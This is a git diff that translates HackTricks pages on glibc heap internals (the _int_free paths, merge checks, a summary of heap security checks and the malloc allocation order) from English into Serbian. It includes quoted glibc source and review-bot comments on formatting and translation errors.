### \_int_free tcache -It'll first try to allocate this chunk in the related tcache. However, some checks are performed previously. It'll loop through all the chunks of the tcache in the same index as the freed chunk and: +Prvo će pokušati da alocira ovaj deo u povezanoj tcache. Međutim, prethodno se vrše neka proveravanja. Proći će kroz sve delove tcache na istom indeksu kao oslobođeni deo i: -- If there are more entries than `mp_.tcache_count`: `free(): too many chunks detected in tcache` -- If the entry is not aligned: free(): `unaligned chunk detected in tcache 2` -- if the freed chunk was already freed and is present as chunk in the tcache: `free(): double free detected in tcache 2` +- Ako ima više unosa nego `mp_.tcache_count`: `free(): previše delova otkriveno u tcache` +- Ako unos nije poravnat: free(): `neporavnat deo otkriven u tcache 2` +- ako je oslobođeni deo već bio oslobođen i prisutan je kao deo u tcache: `free(): dvostruko oslobađanje otkriveno u tcache 2` -If all goes well, the chunk is added to the tcache and the functions returns. +Ako sve prođe dobro, deo se dodaje u tcache i funkcija se vraća.
_int_free tcache - ```c // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L4515C1-L4554C7 #if USE_TCACHE - { - size_t tc_idx = csize2tidx (size); - if (tcache != NULL && tc_idx < mp_.tcache_bins) - { - /* Check to see if it's already in the tcache. */ - tcache_entry *e = (tcache_entry *) chunk2mem (p); +{ +size_t tc_idx = csize2tidx (size); +if (tcache != NULL && tc_idx < mp_.tcache_bins) +{ +/* Check to see if it's already in the tcache. */ +tcache_entry *e = (tcache_entry *) chunk2mem (p); - /* This test succeeds on double free. However, we don't 100% - trust it (it also matches random payload data at a 1 in - 2^ chance), so verify it's not an unlikely - coincidence before aborting. */ - if (__glibc_unlikely (e->key == tcache_key)) - { - tcache_entry *tmp; - size_t cnt = 0; - LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx); - for (tmp = tcache->entries[tc_idx]; - tmp; - tmp = REVEAL_PTR (tmp->next), ++cnt) - { - if (cnt >= mp_.tcache_count) - malloc_printerr ("free(): too many chunks detected in tcache"); - if (__glibc_unlikely (!aligned_OK (tmp))) - malloc_printerr ("free(): unaligned chunk detected in tcache 2"); - if (tmp == e) - malloc_printerr ("free(): double free detected in tcache 2"); - /* If we get here, it was a coincidence. We've wasted a - few cycles, but don't abort. */ - } - } +/* This test succeeds on double free. However, we don't 100% +trust it (it also matches random payload data at a 1 in +2^ chance), so verify it's not an unlikely +coincidence before aborting. 
*/ +if (__glibc_unlikely (e->key == tcache_key)) +{ +tcache_entry *tmp; +size_t cnt = 0; +LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx); +for (tmp = tcache->entries[tc_idx]; +tmp; +tmp = REVEAL_PTR (tmp->next), ++cnt) +{ +if (cnt >= mp_.tcache_count) +malloc_printerr ("free(): too many chunks detected in tcache"); +if (__glibc_unlikely (!aligned_OK (tmp))) +malloc_printerr ("free(): unaligned chunk detected in tcache 2"); +if (tmp == e) +malloc_printerr ("free(): double free detected in tcache 2"); +/* If we get here, it was a coincidence. We've wasted a +few cycles, but don't abort. */ +} +} - if (tcache->counts[tc_idx] < mp_.tcache_count) - { - tcache_put (p, tc_idx); - return; - } - } - } +if (tcache->counts[tc_idx] < mp_.tcache_count) +{ +tcache_put (p, tc_idx); +return; +} +} +} #endif ``` -
### \_int_free fast bin -Start by checking that the size is suitable for fast bin and check if it's possible to set it close to the top chunk. +Počnite proverom da li je veličina pogodna za fast bin i proverite da li je moguće postaviti je blizu top chunk-a. -Then, add the freed chunk at the top of the fast bin while performing some checks: +Zatim, dodajte oslobođeni chunk na vrh fast bin-a dok vršite neke provere: -- If the size of the chunk is invalid (too big or small) trigger: `free(): invalid next size (fast)` -- If the added chunk was already the top of the fast bin: `double free or corruption (fasttop)` -- If the size of the chunk at the top has a different size of the chunk we are adding: `invalid fastbin entry (free)` +- Ako je veličina chunk-a nevažeća (prevelika ili premala) aktivirajte: `free(): invalid next size (fast)` +- Ako je dodatni chunk već bio na vrhu fast bin-a: `double free or corruption (fasttop)` +- Ako veličina chunk-a na vrhu ima drugačiju veličinu od chunk-a koji dodajemo: `invalid fastbin entry (free)`
_int_free Fast Bin - ```c - // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L4556C2-L4631C4 +// From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L4556C2-L4631C4 - /* - If eligible, place chunk on a fastbin so it can be found - and used quickly in malloc. - */ +/* +If eligible, place chunk on a fastbin so it can be found +and used quickly in malloc. +*/ - if ((unsigned long)(size) <= (unsigned long)(get_max_fast ()) +if ((unsigned long)(size) <= (unsigned long)(get_max_fast ()) #if TRIM_FASTBINS - /* - If TRIM_FASTBINS set, don't place chunks - bordering top into fastbins - */ - && (chunk_at_offset(p, size) != av->top) +/* +If TRIM_FASTBINS set, don't place chunks +bordering top into fastbins +*/ +&& (chunk_at_offset(p, size) != av->top) #endif - ) { +) { - if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size)) - <= CHUNK_HDR_SZ, 0) - || __builtin_expect (chunksize (chunk_at_offset (p, size)) - >= av->system_mem, 0)) - { - bool fail = true; - /* We might not have a lock at this point and concurrent modifications - of system_mem might result in a false positive. Redo the test after - getting the lock. */ - if (!have_lock) - { - __libc_lock_lock (av->mutex); - fail = (chunksize_nomask (chunk_at_offset (p, size)) <= CHUNK_HDR_SZ - || chunksize (chunk_at_offset (p, size)) >= av->system_mem); - __libc_lock_unlock (av->mutex); - } +if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size)) +<= CHUNK_HDR_SZ, 0) +|| __builtin_expect (chunksize (chunk_at_offset (p, size)) +>= av->system_mem, 0)) +{ +bool fail = true; +/* We might not have a lock at this point and concurrent modifications +of system_mem might result in a false positive. Redo the test after +getting the lock. 
*/ +if (!have_lock) +{ +__libc_lock_lock (av->mutex); +fail = (chunksize_nomask (chunk_at_offset (p, size)) <= CHUNK_HDR_SZ +|| chunksize (chunk_at_offset (p, size)) >= av->system_mem); +__libc_lock_unlock (av->mutex); +} - if (fail) - malloc_printerr ("free(): invalid next size (fast)"); - } +if (fail) +malloc_printerr ("free(): invalid next size (fast)"); +} - free_perturb (chunk2mem(p), size - CHUNK_HDR_SZ); +free_perturb (chunk2mem(p), size - CHUNK_HDR_SZ); - atomic_store_relaxed (&av->have_fastchunks, true); - unsigned int idx = fastbin_index(size); - fb = &fastbin (av, idx); +atomic_store_relaxed (&av->have_fastchunks, true); +unsigned int idx = fastbin_index(size); +fb = &fastbin (av, idx); - /* Atomically link P to its fastbin: P->FD = *FB; *FB = P; */ - mchunkptr old = *fb, old2; +/* Atomically link P to its fastbin: P->FD = *FB; *FB = P; */ +mchunkptr old = *fb, old2; - if (SINGLE_THREAD_P) - { - /* Check that the top of the bin is not the record we are going to - add (i.e., double free). */ - if (__builtin_expect (old == p, 0)) - malloc_printerr ("double free or corruption (fasttop)"); - p->fd = PROTECT_PTR (&p->fd, old); - *fb = p; - } - else - do - { - /* Check that the top of the bin is not the record we are going to - add (i.e., double free). */ - if (__builtin_expect (old == p, 0)) - malloc_printerr ("double free or corruption (fasttop)"); - old2 = old; - p->fd = PROTECT_PTR (&p->fd, old); - } - while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) - != old2); +if (SINGLE_THREAD_P) +{ +/* Check that the top of the bin is not the record we are going to +add (i.e., double free). */ +if (__builtin_expect (old == p, 0)) +malloc_printerr ("double free or corruption (fasttop)"); +p->fd = PROTECT_PTR (&p->fd, old); +*fb = p; +} +else +do +{ +/* Check that the top of the bin is not the record we are going to +add (i.e., double free). 
*/ +if (__builtin_expect (old == p, 0)) +malloc_printerr ("double free or corruption (fasttop)"); +old2 = old; +p->fd = PROTECT_PTR (&p->fd, old); +} +while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2)) +!= old2); - /* Check that size of fastbin chunk at the top is the same as - size of the chunk that we are adding. We can dereference OLD - only if we have the lock, otherwise it might have already been - allocated again. */ - if (have_lock && old != NULL - && __builtin_expect (fastbin_index (chunksize (old)) != idx, 0)) - malloc_printerr ("invalid fastbin entry (free)"); - } +/* Check that size of fastbin chunk at the top is the same as +size of the chunk that we are adding. We can dereference OLD +only if we have the lock, otherwise it might have already been +allocated again. */ +if (have_lock && old != NULL +&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0)) +malloc_printerr ("invalid fastbin entry (free)"); +} ``` -
### \_int_free finale -If the chunk wasn't allocated yet on any bin, call `_int_free_merge_chunk` +Ako deo još nije dodeljen nijednom kontejneru, pozovite `_int_free_merge_chunk`
_int_free finale - ```c /* - Consolidate other non-mmapped chunks as they arrive. - */ +Consolidate other non-mmapped chunks as they arrive. +*/ - else if (!chunk_is_mmapped(p)) { +else if (!chunk_is_mmapped(p)) { - /* If we're single-threaded, don't lock the arena. */ - if (SINGLE_THREAD_P) - have_lock = true; +/* If we're single-threaded, don't lock the arena. */ +if (SINGLE_THREAD_P) +have_lock = true; - if (!have_lock) - __libc_lock_lock (av->mutex); +if (!have_lock) +__libc_lock_lock (av->mutex); - _int_free_merge_chunk (av, p, size); +_int_free_merge_chunk (av, p, size); - if (!have_lock) - __libc_lock_unlock (av->mutex); - } - /* - If the chunk was allocated via mmap, release via munmap(). - */ +if (!have_lock) +__libc_lock_unlock (av->mutex); +} +/* +If the chunk was allocated via mmap, release via munmap(). +*/ - else { - munmap_chunk (p); - } +else { +munmap_chunk (p); +} } ``` -
## \_int_free_merge_chunk -This function will try to merge chunk P of SIZE bytes with its neighbours. Put the resulting chunk on the unsorted bin list. +Ova funkcija će pokušati da spoji chunk P od SIZE bajtova sa svojim susedima. Stavite rezultantni chunk na listu nesortiranih binova. -Some checks are performed: +Izvode se neka proveravanja: -- If the chunk is the top chunk: `double free or corruption (top)` -- If the next chunk is outside of the boundaries of the arena: `double free or corruption (out)` -- If the chunk is not marked as used (in the `prev_inuse` from the following chunk): `double free or corruption (!prev)` -- If the next chunk has a too little size or too big: `free(): invalid next size (normal)` -- if the previous chunk is not in use, it will try to consolidate. But, if the prev_size differs from the size indicated in the previous chunk: `corrupted size vs. prev_size while consolidating` +- Ako je chunk gornji chunk: `double free or corruption (top)` +- Ako je sledeći chunk van granica arene: `double free or corruption (out)` +- Ako chunk nije označen kao korišćen (u `prev_inuse` sledećeg chucka): `double free or corruption (!prev)` +- Ako sledeći chunk ima premalu ili preveliku veličinu: `free(): invalid next size (normal)` +- ako prethodni chunk nije u upotrebi, pokušaće da konsoliduje. Ali, ako se prev_size razlikuje od veličine navedene u prethodnom chunku: `corrupted size vs. prev_size while consolidating`
_int_free_merge_chunk code - ```c // From https://github.com/bminor/glibc/blob/f942a732d37a96217ef828116ebe64a644db18d7/malloc/malloc.c#L4660C1-L4702C2 /* Try to merge chunk P of SIZE bytes with its neighbors. Put the - resulting chunk on the appropriate bin list. P must not be on a - bin list yet, and it can be in use. */ +resulting chunk on the appropriate bin list. P must not be on a +bin list yet, and it can be in use. */ static void _int_free_merge_chunk (mstate av, mchunkptr p, INTERNAL_SIZE_T size) { - mchunkptr nextchunk = chunk_at_offset(p, size); +mchunkptr nextchunk = chunk_at_offset(p, size); - /* Lightweight tests: check whether the block is already the - top block. */ - if (__glibc_unlikely (p == av->top)) - malloc_printerr ("double free or corruption (top)"); - /* Or whether the next chunk is beyond the boundaries of the arena. */ - if (__builtin_expect (contiguous (av) - && (char *) nextchunk - >= ((char *) av->top + chunksize(av->top)), 0)) - malloc_printerr ("double free or corruption (out)"); - /* Or whether the block is actually not marked used. */ - if (__glibc_unlikely (!prev_inuse(nextchunk))) - malloc_printerr ("double free or corruption (!prev)"); +/* Lightweight tests: check whether the block is already the +top block. */ +if (__glibc_unlikely (p == av->top)) +malloc_printerr ("double free or corruption (top)"); +/* Or whether the next chunk is beyond the boundaries of the arena. */ +if (__builtin_expect (contiguous (av) +&& (char *) nextchunk +>= ((char *) av->top + chunksize(av->top)), 0)) +malloc_printerr ("double free or corruption (out)"); +/* Or whether the block is actually not marked used. 
*/ +if (__glibc_unlikely (!prev_inuse(nextchunk))) +malloc_printerr ("double free or corruption (!prev)"); - INTERNAL_SIZE_T nextsize = chunksize(nextchunk); - if (__builtin_expect (chunksize_nomask (nextchunk) <= CHUNK_HDR_SZ, 0) - || __builtin_expect (nextsize >= av->system_mem, 0)) - malloc_printerr ("free(): invalid next size (normal)"); +INTERNAL_SIZE_T nextsize = chunksize(nextchunk); +if (__builtin_expect (chunksize_nomask (nextchunk) <= CHUNK_HDR_SZ, 0) +|| __builtin_expect (nextsize >= av->system_mem, 0)) +malloc_printerr ("free(): invalid next size (normal)"); - free_perturb (chunk2mem(p), size - CHUNK_HDR_SZ); +free_perturb (chunk2mem(p), size - CHUNK_HDR_SZ); - /* Consolidate backward. */ - if (!prev_inuse(p)) - { - INTERNAL_SIZE_T prevsize = prev_size (p); - size += prevsize; - p = chunk_at_offset(p, -((long) prevsize)); - if (__glibc_unlikely (chunksize(p) != prevsize)) - malloc_printerr ("corrupted size vs. prev_size while consolidating"); - unlink_chunk (av, p); - } +/* Consolidate backward. */ +if (!prev_inuse(p)) +{ +INTERNAL_SIZE_T prevsize = prev_size (p); +size += prevsize; +p = chunk_at_offset(p, -((long) prevsize)); +if (__glibc_unlikely (chunksize(p) != prevsize)) +malloc_printerr ("corrupted size vs. prev_size while consolidating"); +unlink_chunk (av, p); +} - /* Write the chunk header, maybe after merging with the following chunk. */ - size = _int_free_create_chunk (av, p, size, nextchunk, nextsize); - _int_free_maybe_consolidate (av, size); +/* Write the chunk header, maybe after merging with the following chunk. */ +size = _int_free_create_chunk (av, p, size, nextchunk, nextsize); +_int_free_maybe_consolidate (av, size); } ``` -
{{#include ../../../banners/hacktricks-training.md}} diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md b/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md index 18a0a02b7..47253e250 100644 --- a/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md +++ b/src/binary-exploitation/libc-heap/heap-memory-functions/heap-functions-security-checks.md 
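Review bot: the blank line separating the `_int_free finale` and `_int_free_merge_chunk code` toggle labels from their ```c fences is removed (`_int_free finale - ```c`, `_int_free_merge_chunk code - ```c`); if those labels live inside an HTML `<details>`/`<summary>` element, CommonMark keeps the HTML block open until a blank line, so the fence can be swallowed and the C source stops rendering as a code block. Keep the blank line before each fence. Separately, every line of the quoted glibc code is touched only to strip its leading indentation (e.g. `- fb = &fastbin (av, idx);` becomes `+fb = &fastbin (av, idx);`), which flattens the `if (SINGLE_THREAD_P) { ... } else do { ... } while (...)` structure and makes the hunk several times larger than the translation itself; leave upstream code formatting as it was. In the prose, "chunk" is rendered as `deo` and "bin" as `kontejneru` in the `_int_free finale` paragraph but kept as `chunk` and `binova` in the `_int_free_merge_chunk` paragraph; pick one term per concept for the whole page, and "Izvode se neka proveravanja" should read "Izvode se neke provere".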
@@ -4,160 +4,160 @@ ## unlink -For more info check: +Za više informacija pogledajte: {{#ref}} unlink.md {{#endref}} -This is a summary of the performed checks: +Ovo je sažetak izvršenih provera: -- Check if the indicated size of the chunk is the same as the `prev_size` indicated in the next chunk - - Error message: `corrupted size vs. prev_size` -- Check also that `P->fd->bk == P` and `P->bk->fw == P` - - Error message: `corrupted double-linked list` -- If the chunk is not small, check that `P->fd_nextsize->bk_nextsize == P` and `P->bk_nextsize->fd_nextsize == P` - - Error message: `corrupted double-linked list (not small)` +- Proverite da li je naznačena veličina dela ista kao `prev_size` naznačena u sledećem delu +- Poruka o grešci: `corrupted size vs. prev_size` +- Takođe proverite da li je `P->fd->bk == P` i `P->bk->fw == P` +- Poruka o grešci: `corrupted double-linked list` +- Ako deo nije mali, proverite da li je `P->fd_nextsize->bk_nextsize == P` i `P->bk_nextsize->fd_nextsize == P` +- Poruka o grešci: `corrupted double-linked list (not small)` ## \_int_malloc -For more info check: +Za više informacija pogledajte: {{#ref}} malloc-and-sysmalloc.md {{#endref}} -- **Checks during fast bin search:** - - If the chunk is misaligned: - - Error message: `malloc(): unaligned fastbin chunk detected 2` - - If the forward chunk is misaligned: - - Error message: `malloc(): unaligned fastbin chunk detected` - - If the returned chunk has a size that isn't correct because of it's index in the fast bin: - - Error message: `malloc(): memory corruption (fast)` - - If any chunk used to fill the tcache is misaligned: - - Error message: `malloc(): unaligned fastbin chunk detected 3` -- **Checks during small bin search:** - - If `victim->bk->fd != victim`: - - Error message: `malloc(): smallbin double linked list corrupted` -- **Checks during consolidate** performed for each fast bin chunk: - - If the chunk is unaligned trigger: - - Error message: `malloc_consolidate(): unaligned 
fastbin chunk detected` - - If the chunk has a different size that the one it should because of the index it's in: - - Error message: `malloc_consolidate(): invalid chunk size` - - If the previous chunk is not in use and the previous chunk has a size different of the one indicated by prev_chunk: - - Error message: `corrupted size vs. prev_size in fastbins` -- **Checks during unsorted bin search**: - - If the chunk size is weird (too small or too big): - - Error message: `malloc(): invalid size (unsorted)` - - If the next chunk size is weird (too small or too big): - - Error message: `malloc(): invalid next size (unsorted)` - - If the previous size indicated by the next chunk differs from the size of the chunk: - - Error message: `malloc(): mismatching next->prev_size (unsorted)` - - If not `victim->bck->fd == victim` or not `victim->fd == av (arena)`: - - Error message: `malloc(): unsorted double linked list corrupted` - - As we are always checking the las one, it's fd should be pointing always to the arena struct. 
- - If the next chunk isn't indicating that the previous is in use: - - Error message: `malloc(): invalid next->prev_inuse (unsorted)` - - If `fwd->bk_nextsize->fd_nextsize != fwd`: - - Error message: `malloc(): largebin double linked list corrupted (nextsize)` - - If `fwd->bk->fd != fwd`: - - Error message: `malloc(): largebin double linked list corrupted (bk)` -- **Checks during large bin (by index) search:** - - `bck->fd-> bk != bck`: - - Error message: `malloc(): corrupted unsorted chunks` -- **Checks during large bin (next bigger) search:** - - `bck->fd-> bk != bck`: - - Error message: `malloc(): corrupted unsorted chunks2` -- **Checks during Top chunk use:** - - `chunksize(av->top) > av->system_mem`: - - Error message: `malloc(): corrupted top size` +- **Provere tokom pretrage brzih binova:** +- Ako je deo neusklađen: +- Poruka o grešci: `malloc(): unaligned fastbin chunk detected 2` +- Ako je napredni deo neusklađen: +- Poruka o grešci: `malloc(): unaligned fastbin chunk detected` +- Ako je vraćeni deo veličine koja nije ispravna zbog svog indeksa u brzom binu: +- Poruka o grešci: `malloc(): memory corruption (fast)` +- Ako je bilo koji deo korišćen za popunjavanje tcache-a neusklađen: +- Poruka o grešci: `malloc(): unaligned fastbin chunk detected 3` +- **Provere tokom pretrage malih binova:** +- Ako `victim->bk->fd != victim`: +- Poruka o grešci: `malloc(): smallbin double linked list corrupted` +- **Provere tokom konsolidacije** izvršene za svaki deo brzog bin-a: +- Ako je deo neusklađen: +- Poruka o grešci: `malloc_consolidate(): unaligned fastbin chunk detected` +- Ako deo ima drugačiju veličinu od one koju bi trebao imati zbog indeksa u kojem se nalazi: +- Poruka o grešci: `malloc_consolidate(): invalid chunk size` +- Ako prethodni deo nije u upotrebi i prethodni deo ima veličinu koja se razlikuje od one naznačene od strane prev_chunk: +- Poruka o grešci: `corrupted size vs. 
prev_size in fastbins` +- **Provere tokom pretrage nesortiranih binova**: +- Ako je veličina dela čudna (previše mala ili previše velika): +- Poruka o grešci: `malloc(): invalid size (unsorted)` +- Ako je veličina sledećeg dela čudna (previše mala ili previše velika): +- Poruka o grešci: `malloc(): invalid next size (unsorted)` +- Ako se prethodna veličina naznačena od strane sledećeg dela razlikuje od veličine dela: +- Poruka o grešci: `malloc(): mismatching next->prev_size (unsorted)` +- Ako nije `victim->bck->fd == victim` ili nije `victim->fd == av (arena)`: +- Poruka o grešci: `malloc(): unsorted double linked list corrupted` +- Kako uvek proveravamo poslednji, njegov fd bi trebao uvek da pokazuje na strukturu arena. +- Ako sledeći deo ne naznačuje da je prethodni u upotrebi: +- Poruka o grešci: `malloc(): invalid next->prev_inuse (unsorted)` +- Ako `fwd->bk_nextsize->fd_nextsize != fwd`: +- Poruka o grešci: `malloc(): largebin double linked list corrupted (nextsize)` +- Ako `fwd->bk->fd != fwd`: +- Poruka o grešci: `malloc(): largebin double linked list corrupted (bk)` +- **Provere tokom pretrage velikih binova (po indeksu):** +- `bck->fd-> bk != bck`: +- Poruka o grešci: `malloc(): corrupted unsorted chunks` +- **Provere tokom pretrage velikih binova (sledeći veći):** +- `bck->fd-> bk != bck`: +- Poruka o grešci: `malloc(): corrupted unsorted chunks2` +- **Provere tokom korišćenja Top dela:** +- `chunksize(av->top) > av->system_mem`: +- Poruka o grešci: `malloc(): corrupted top size` ## `tcache_get_n` -- **Checks in `tcache_get_n`:** - - If chunk is misaligned: - - Error message: `malloc(): unaligned tcache chunk detected` +- **Provere u `tcache_get_n`:** +- Ako je deo neusklađen: +- Poruka o grešci: `malloc(): unaligned tcache chunk detected` ## `tcache_thread_shutdown` -- **Checks in `tcache_thread_shutdown`:** - - If chunk is misaligned: - - Error message: `tcache_thread_shutdown(): unaligned tcache chunk detected` +- **Provere u 
`tcache_thread_shutdown`:** +- Ako je deo neusklađen: +- Poruka o grešci: `tcache_thread_shutdown(): unaligned tcache chunk detected` ## `__libc_realloc` -- **Checks in `__libc_realloc`:** - - If old pointer is misaligned or the size was incorrect: - - Error message: `realloc(): invalid pointer` +- **Provere u `__libc_realloc`:** +- Ako je stari pokazivač neusklađen ili je veličina bila neispravna: +- Poruka o grešci: `realloc(): invalid pointer` ## `_int_free` -For more info check: +Za više informacija pogledajte: {{#ref}} free.md {{#endref}} -- **Checks during the start of `_int_free`:** - - Pointer is aligned: - - Error message: `free(): invalid pointer` - - Size larger than `MINSIZE` and size also aligned: - - Error message: `free(): invalid size` -- **Checks in `_int_free` tcache:** - - If there are more entries than `mp_.tcache_count`: - - Error message: `free(): too many chunks detected in tcache` - - If the entry is not aligned: - - Error message: `free(): unaligned chunk detected in tcache 2` - - If the freed chunk was already freed and is present as chunk in the tcache: - - Error message: `free(): double free detected in tcache 2` -- **Checks in `_int_free` fast bin:** - - If the size of the chunk is invalid (too big or small) trigger: - - Error message: `free(): invalid next size (fast)` - - If the added chunk was already the top of the fast bin: - - Error message: `double free or corruption (fasttop)` - - If the size of the chunk at the top has a different size of the chunk we are adding: - - Error message: `invalid fastbin entry (free)` +- **Provere na početku `_int_free`:** +- Pokazivač je usklađen: +- Poruka o grešci: `free(): invalid pointer` +- Veličina veća od `MINSIZE` i veličina takođe usklađena: +- Poruka o grešci: `free(): invalid size` +- **Provere u `_int_free` tcache:** +- Ako ima više unosa nego `mp_.tcache_count`: +- Poruka o grešci: `free(): too many chunks detected in tcache` +- Ako unos nije usklađen: +- Poruka o grešci: `free(): 
unaligned chunk detected in tcache 2` +- Ako je oslobođeni deo već bio oslobođen i prisutan je kao deo u tcache: +- Poruka o grešci: `free(): double free detected in tcache 2` +- **Provere u `_int_free` brzom binu:** +- Ako je veličina dela neispravna (prevelika ili premala) pokreni: +- Poruka o grešci: `free(): invalid next size (fast)` +- Ako je dodatni deo već bio vrh brzog bin-a: +- Poruka o grešci: `double free or corruption (fasttop)` +- Ako veličina dela na vrhu ima drugačiju veličinu od dela koji dodajemo: +- Poruka o grešci: `invalid fastbin entry (free)` ## **`_int_free_merge_chunk`** -- **Checks in `_int_free_merge_chunk`:** - - If the chunk is the top chunk: - - Error message: `double free or corruption (top)` - - If the next chunk is outside of the boundaries of the arena: - - Error message: `double free or corruption (out)` - - If the chunk is not marked as used (in the prev_inuse from the following chunk): - - Error message: `double free or corruption (!prev)` - - If the next chunk has a too little size or too big: - - Error message: `free(): invalid next size (normal)` - - If the previous chunk is not in use, it will try to consolidate. But, if the `prev_size` differs from the size indicated in the previous chunk: - - Error message: `corrupted size vs. prev_size while consolidating` +- **Provere u `_int_free_merge_chunk`:** +- Ako je deo vrh deo: +- Poruka o grešci: `double free or corruption (top)` +- Ako je sledeći deo van granica arene: +- Poruka o grešci: `double free or corruption (out)` +- Ako deo nije označen kao korišćen (u prev_inuse od sledećeg dela): +- Poruka o grešci: `double free or corruption (!prev)` +- Ako sledeći deo ima previše malu ili preveliku veličinu: +- Poruka o grešci: `free(): invalid next size (normal)` +- Ako prethodni deo nije u upotrebi, pokušaće da konsoliduje. Ali, ako se `prev_size` razlikuje od veličine naznačene u prethodnom delu: +- Poruka o grešci: `corrupted size vs. 
prev_size while consolidating` ## **`_int_free_create_chunk`** -- **Checks in `_int_free_create_chunk`:** - - Adding a chunk into the unsorted bin, check if `unsorted_chunks(av)->fd->bk == unsorted_chunks(av)`: - - Error message: `free(): corrupted unsorted chunks` +- **Provere u `_int_free_create_chunk`:** +- Dodavanje dela u nesortirani bin, proverite da li `unsorted_chunks(av)->fd->bk == unsorted_chunks(av)`: +- Poruka o grešci: `free(): corrupted unsorted chunks` ## `do_check_malloc_state` -- **Checks in `do_check_malloc_state`:** - - If misaligned fast bin chunk: - - Error message: `do_check_malloc_state(): unaligned fastbin chunk detected` +- **Provere u `do_check_malloc_state`:** +- Ako je deo neusklađen brzog bin-a: +- Poruka o grešci: `do_check_malloc_state(): unaligned fastbin chunk detected` ## `malloc_consolidate` -- **Checks in `malloc_consolidate`:** - - If misaligned fast bin chunk: - - Error message: `malloc_consolidate(): unaligned fastbin chunk detected` - - If incorrect fast bin chunk size: - - Error message: `malloc_consolidate(): invalid chunk size` +- **Provere u `malloc_consolidate`:** +- Ako je deo neusklađen brzog bin-a: +- Poruka o grešci: `malloc_consolidate(): unaligned fastbin chunk detected` +- Ako je veličina dela brzog bin-a neispravna: +- Poruka o grešci: `malloc_consolidate(): invalid chunk size` ## `_int_realloc` -- **Checks in `_int_realloc`:** - - Size is too big or too small: - - Error message: `realloc(): invalid old size` - - Size of the next chunk is too big or too small: - - Error message: `realloc(): invalid next size` +- **Provere u `_int_realloc`:** +- Veličina je prevelika ili premala: +- Poruka o grešci: `realloc(): invalid old size` +- Veličina sledećeg dela je prevelika ili premala: +- Poruka o grešci: `realloc(): invalid next size` {{#include ../../../banners/hacktricks-training.md}} 
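Review bot: the nested list structure is lost throughout this hunk: in the original each `Error message:` item is indented under its condition (`- If the chunk is misaligned:` / `  - Error message: ...`), but the translation emits both at the same level (`+- Ako je deo neusklađen:` / `+- Poruka o grešci: ...`), so the rendered page no longer shows which message belongs to which check, and the per-phase groupings (`**Provere tokom pretrage brzih binova:**`) lose their children too. Restore the two-space indentation of the sub-items. A few translations also change meaning: "forward chunk" is rendered `napredni deo` (advanced) rather than the next/`fd` chunk; "the added chunk" becomes `dodatni deo` (additional) instead of `dodati deo`; `Ako je deo vrh deo` and `Ako je deo neusklađen brzog bin-a` are ungrammatical (`Ako je deo top chunk`, `Ako je deo fast bin-a neusklađen`). The pre-existing `bck->fd-> bk` spacing could be fixed to `bck->fd->bk` while the lines are being rewritten.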
diff --git a/src/binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.md b/src/binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.md index 3b2ab7085..e089fbf27 100644 --- a/src/binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.md +++ b/src/binary-exploitation/libc-heap/heap-memory-functions/malloc-and-sysmalloc.md 
@@ -2,37 +2,36 @@ {{#include ../../../banners/hacktricks-training.md}} -## Allocation Order Summary +## Rezime Redosleda Alokacije -(No checks are explained in this summary and some case have been omitted for brevity) +(Nema provere objašnjenih u ovom rezimeu i neki slučajevi su izostavljeni radi sažetosti) -1. `__libc_malloc` tries to get a chunk from the tcache, if not it calls `_int_malloc` +1. `__libc_malloc` pokušava da dobije deo iz tcache, ako ne uspe, poziva `_int_malloc` 2. `_int_malloc` : - 1. Tries to generate the arena if there isn't any - 2. If any fast bin chunk of the correct size, use it - 1. Fill tcache with other fast chunks - 3. If any small bin chunk of the correct size, use it - 1. Fill tcache with other chunks of that size - 4. If the requested size isn't for small bins, consolidate fast bin into unsorted bin - 5. Check the unsorted bin, use the first chunk with enough space - 1. If the found chunk is bigger, divide it to return a part and add the reminder back to the unsorted bin - 2. If a chunk is of the same size as the size requested, use to to fill the tcache instead of returning it (until the tcache is full, then return the next one) - 3. For each chunk of smaller size checked, put it in its respective small or large bin - 6. Check the large bin in the index of the requested size - 1. Start looking from the first chunk that is bigger than the requested size, if any is found return it and add the reminders to the small bin - 7. Check the large bins from the next indexes until the end - 1. From the next bigger index check for any chunk, divide the first found chunk to use it for the requested size and add the reminder to the unsorted bin - 8. If nothing is found in the previous bins, get a chunk from the top chunk - 9. If the top chunk wasn't big enough enlarge it with `sysmalloc` +1. Pokušava da generiše arenu ako ne postoji +2. Ako postoji bilo koji fast bin deo odgovarajuće veličine, koristi ga +1. 
Popunjava tcache sa drugim brzim delovima +3. Ako postoji bilo koji small bin deo odgovarajuće veličine, koristi ga +1. Popunjava tcache sa drugim delovima te veličine +4. Ako tražena veličina nije za small bins, konsoliduje fast bin u nesortirani bin +5. Proverava nesortirani bin, koristi prvi deo sa dovoljno prostora +1. Ako je pronađeni deo veći, podeli ga da vrati deo i dodaj ostatak nazad u nesortirani bin +2. Ako je deo iste veličine kao tražena veličina, koristi ga da popuni tcache umesto da ga vrati (dok tcache ne bude pun, onda vrati sledeći) +3. Za svaki deo manje veličine koji se proverava, stavi ga u odgovarajući small ili large bin +6. Proverava large bin u indeksu tražene veličine +1. Počinje da gleda od prvog dela koji je veći od tražene veličine, ako se pronađe, vrati ga i dodaj ostatke u small bin +7. Proverava large bins od sledećih indeksa do kraja +1. Od sledećeg većeg indeksa proverava bilo koji deo, podeli prvi pronađeni deo da ga koristi za traženu veličinu i dodaj ostatak u nesortirani bin +8. Ako ništa nije pronađeno u prethodnim binovima, uzmi deo iz top chunk +9. Ako top chunk nije bio dovoljno velik, povećaj ga sa `sysmalloc` ## \_\_libc_malloc -The `malloc` 